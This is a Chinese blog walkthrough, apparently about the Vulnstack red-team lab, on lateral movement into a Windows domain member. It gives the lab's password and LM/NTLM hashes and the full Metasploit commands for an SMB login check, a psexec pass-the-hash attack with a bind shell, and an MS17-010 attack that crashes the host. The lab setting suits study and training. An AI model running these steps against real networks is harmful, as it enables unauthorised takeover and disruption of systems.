2. 程式人生 > 其它 >內網橫向滲透 之 ATT&CK系列一 之 橫向滲透域主機

內網橫向滲透 之 ATT&CK系列一 之 橫向滲透域主機

阿新 發佈:2022-04-05

前言

上一篇文章中已獲取了關於域的一些基本資訊,在這裡再整理一下,不知道資訊收集的小夥伴可以看回上一篇文章哦

域:god.org

域控 windows server 2008:OWA,192.168.52.138

域主機 windows server 2003:ROOT-TVI862UBEH,192.168.52.141

win7內網ip:192.168.52.143

win7 username : Administrator domain : GOD password : hongrisec@2022(因為登陸域控機win2008的時候會要求改密碼,我這個改成hongrisec@2022)

LM:edea194d76c77d87923b4276177762ae;NTLM:8c535a2d84c3b21059d667639bb89db5

 

 

橫向滲透

通過win7的nmap對域成員進行漏洞埠掃描,使用 where nmap 可以得到nmap的安裝路徑

nmap.exe --script=vuln 192.168.52.141

存在ms08-067(CVE-2008-4250)、ms17-010(CVE-2017-0143)

使用 scanner/smb/smb_login 驗證SMB登入

use scanner/smb/smb_login
set RHOSTS 192.168.52.141
set SMBPass hongrisec@2022
set SMBUSER Administrator
set SMBDomain GOD
run

說明win7的賬號密碼對域成員也有效

至此,域成員存在漏洞,且知道使用者名稱、密碼、域,使用漏洞進行滲透獲取域內使用許可權

因為是內網windows系統,這裡我選擇用雜湊傳遞攻擊,使用的模組是 exploit/windows/smb/psexec

 

use exploit/windows/smb/psexec
set payload windows/shell/bind_tcp
set RHOSTS 192.168.52.141
set SMBDomain god
set SMBUser Administrator
set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5    # 這裡是用雜湊密碼傳遞,冒號前面的是LM雜湊值,冒號後面的是NTLM雜湊值
 

run

 

檢視許可權 whoami

可以看到,是管理員的最高許可權,這裡就不需要提權了,至此,域主機已被攻破!

 

彩蛋

域主機 windows server 2003 存在ms17-010漏洞,可以通過ms17-010漏洞進行攻擊

注:msfconsole中的ms17_010_eternalblue模組僅支援x64,而咱們的目標域主機是x86的,所以這裡不適用

使用模組 ms17_010_psexec 進行攻擊,這裡選擇這個模組的原因:在域內,且存在ms17-010漏洞

use exploit/windows/smb/ms17_010_psexec
set RHOSTS 192.168.52.141
set SMBDomain GOD
set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5
set SMBUser Administrator
run

域主機藍屏

msfconsole報錯

 

 至此攻擊成功,沒有反彈shell,因為目標域主機已藍屏!

 

 

 

 

 

TRANSLATE with x English
Arabic Hebrew Polish
Bulgarian Hindi Portuguese
Catalan Hmong Daw Romanian
Chinese Simplified Hungarian Russian
Chinese Traditional Indonesian Slovak
Czech Italian Slovenian
Danish Japanese Spanish
Dutch Klingon Swedish
English Korean Thai
Estonian Latvian Turkish
Finnish Lithuanian Ukrainian
French Malay Urdu
German Maltese Vietnamese
Greek Norwegian Welsh
Haitian Creole Persian  
  TRANSLATE with COPY THE URL BELOW Back EMBED THE SNIPPET BELOW IN YOUR SITE Enable collaborative features and customize widget: Bing Webmaster Portal Back

前言

上一篇文章中已獲取了關於域的一些基本資訊,在這裡再整理一下,不知道資訊收集的小夥伴可以看回上一篇文章哦

域:god.org

域控 windows server 2008:OWA,192.168.52.138

域主機 windows server 2003:ROOT-TVI862UBEH,192.168.52.141

win7內網ip:192.168.52.143

win7 username : Administrator domain : GOD password : hongrisec@2022(因為登陸域控機win2008的時候會要求改密碼,我這個改成hongrisec@2022)

LM:edea194d76c77d87923b4276177762ae;NTLM:8c535a2d84c3b21059d667639bb89db5

 

 

橫向滲透

通過win7的nmap對域成員進行漏洞埠掃描,使用 where nmap 可以得到nmap的安裝路徑

nmap.exe --script=vuln 192.168.52.141

存在ms08-067(CVE-2008-4250)、ms17-010(CVE-2017-0143)

使用 scanner/smb/smb_login 驗證SMB登入

use scanner/smb/smb_login
set RHOSTS 192.168.52.141
set SMBPass hongrisec@2022
set SMBUSER Administrator
set SMBDomain GOD
run

說明win7的賬號密碼對域成員也有效

至此,域成員存在漏洞,且知道使用者名稱、密碼、域,使用漏洞進行滲透獲取域內使用許可權

因為是內網windows系統,這裡我選擇用雜湊傳遞攻擊,使用的模組是 exploit/windows/smb/psexec

 

use exploit/windows/smb/psexec
set payload windows/shell/bind_tcp
set RHOSTS 192.168.52.141
set SMBDomain god
set SMBUser Administrator
set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5    # 這裡是用雜湊密碼傳遞,冒號前面的是LM雜湊值,冒號後面的是NTLM雜湊值
run

 

檢視許可權 whoami

可以看到,是管理員的最高許可權,這裡就不需要提權了,至此,域主機已被攻破!

 

彩蛋

域主機 windows server 2003 存在ms17-010漏洞,可以通過ms17-010漏洞進行攻擊

注:msfconsole中的ms17_010_eternalblue模組僅支援x64,而咱們的目標域主機是x86的,所以這裡不適用

使用模組 ms17_010_psexec 進行攻擊,這裡選擇這個模組的原因:在域內,且存在ms17-010漏洞

use exploit/windows/smb/ms17_010_psexec
set RHOSTS 192.168.52.141
set SMBDomain GOD
set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5
set SMBUser Administrator
run

域主機藍屏

msfconsole報錯

 

 至此攻擊成功,沒有反彈shell,因為目標域主機已藍屏!

 

 

 

 

 

相關推薦

橫向滲透 ATT&CK系列 橫向滲透主機

前言 上篇文章中已獲取了關於的一些基本資訊,在這裡再整理一下,不知道資訊收集的小夥伴可以看回上篇文章哦

橫向滲透 ATT&CK系列 拿下控制器

資訊收集 資訊收集 控制器的相關資訊: 通過arp掃描發現控制器的ip地址為:192.168.52.138,嘗試使用msf的smb_login模組登入smb是否成功

ATT&CK紅隊評估二滲透過程

前言: 開源靶場VulnStack是由國內紅日安全團隊打造一個靶場知識平臺。靶場設計思路來源ATT&CK紅隊評估模式,從漏洞利用、內網蒐集、橫向移動、構建通道、持久控制、痕跡清理等方式進行搭建靶場。最近正在學習

ATT&CK紅隊評估三滲透過程

、環境搭建 環境配置:開啟虛擬機器映象為掛起狀態,第一時間進行快照,部分服務未做自啟,重啟後無法自動執行。掛起狀態,賬號已預設登陸,centos為出機,第一次執行,需重新獲取橋接模式絡卡ip。除重新獲取i

ATT&CK系列 知識點總結

、環境搭建1.環境搭建測試2.資訊收集二、漏洞利用3.漏洞搜尋與利用4.後臺Getshell上傳技巧5.系統資訊收集6.主機密碼收集三、內網蒐集7.內網--繼續資訊收集8.內網攻擊姿勢--資訊洩露9.內網攻擊姿勢-MS08-06710.內網

ATT&CK紅隊滲透

訪問10.88.0.233,發現是thinkphp 構造url發現報錯,,thinkphp的版本為5.0.22 扔到goby裡發現開放了3306和80,以及存在RCE

ATT&CK 實戰 - 紅日安全 vulnstack () 靶機滲透

關於部署:https://www.cnblogs.com/Cl0ud/p/13688649.html PS:好菜,後來發現內網主機還是PING不通VM1,索性三臺主機全部配成NAT模式,按照WEB靶機(VM1)->內網滲透域成員主機(VM2)->拿下管(VM3)的步

ATT&CK實戰系列 - 紅隊實戰 (3)

接著2來進行滲透 拓撲: 上次滲透完win7,並進行了提權 繼續執行payload,使得win7防火牆能允許我們遠端登入

ATT&CK實戰系列——紅隊實戰(二)

靶機下載地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 太長不看版 流水 1. 建立立足點

ATT&CK實戰系列——紅隊實戰(七)

、環境搭建 靶機下載地址http://vulnstack.qiyuanxuetang.net/vuln/detail/9/假設滲透的目標客戶只給出了一個域名www.whopen.com,我們要在黑盒的情況下對目標網路進行滲透,最終需要拿下控制器許可權

紅隊技術-父程序偽裝( MITRE ATT&CK框架:T1134)

 概述  父程序偽裝是種訪問令牌操作技術,通過將惡意檔案的PPID指定為explorer.exe等合法程序的PPID,可幫助攻擊者規避啟發式檢測等防禦技術。

TCPsend & recv,篇就夠了

接觸過網路開發的人,大抵都知道,上層應用使用send函式傳送資料,使用recv來接收資料,而send和recv的實現原理又是怎樣的呢?

賺專案】日常賺零花錢系列:**遊戲掛機30分鐘,杯奶茶錢到手

導讀: 不是我浮誇,確實就是這麼簡單,每天掛機30分鐘,杯奶茶錢就能到手。

滲透橫向移動

公眾號:白帽子左 hash 介紹 在環境中,使用者資訊儲存在控的ntds.dit(C:\\Windows\\NTDS\\NTDS.dit)中;非環境也就是在工作組環境中,當前主機使用者的密碼資訊儲存著在sam檔案(C:\\Windows\\System32\

滲透-dns隧道通訊原理&特徵

1、dns是什麼 DNS是 Domain Name System 的縮寫,也就是 域名解析系統,它的作用非常簡單,就是根據域名查出對應的 IP地址。

滲透通道構建

實驗環境: Win7:192.168.152.136 Win2008:192.168.152.135 物理機:199.200.233.176 在win2008阻止物理機的訪問,即win2008只可以win7訪問 物理機可以訪問win7不能訪問win2008:

滲透賬戶查詢

滲透賬戶查詢 https://www.cnblogs.com/iAmSoScArEd/p/13874776.html---來自 我超怕的

次metasploitable2滲透21,22,23埠爆破

Hydra是款非常強大的暴力破解工具,它是由著名的黑客組織THC開發的款開源暴力破解工具。Hydra是一個驗證性質的工具,主要目的是:展示安全研究人員從遠端獲取一個系統認證許可權。

次metasploitable2滲透samba服務的攻擊

80埠中對應一些web靶場,在這裡不記錄 111埠的利用是向rpcbind服務的UDP套接字傳送60位元組載荷,便可填充目標記憶體,搞崩主機系統。在這裡也不記錄

68:安全-橫向PTH&PTK&PTT雜湊票據傳遞

思維導圖 知識點: PTH (pass the hash) 利用lm或者ntlm的值進行的滲透測試 PTT (pass the ticket) 利用的票據憑證TGT進行的滲透測試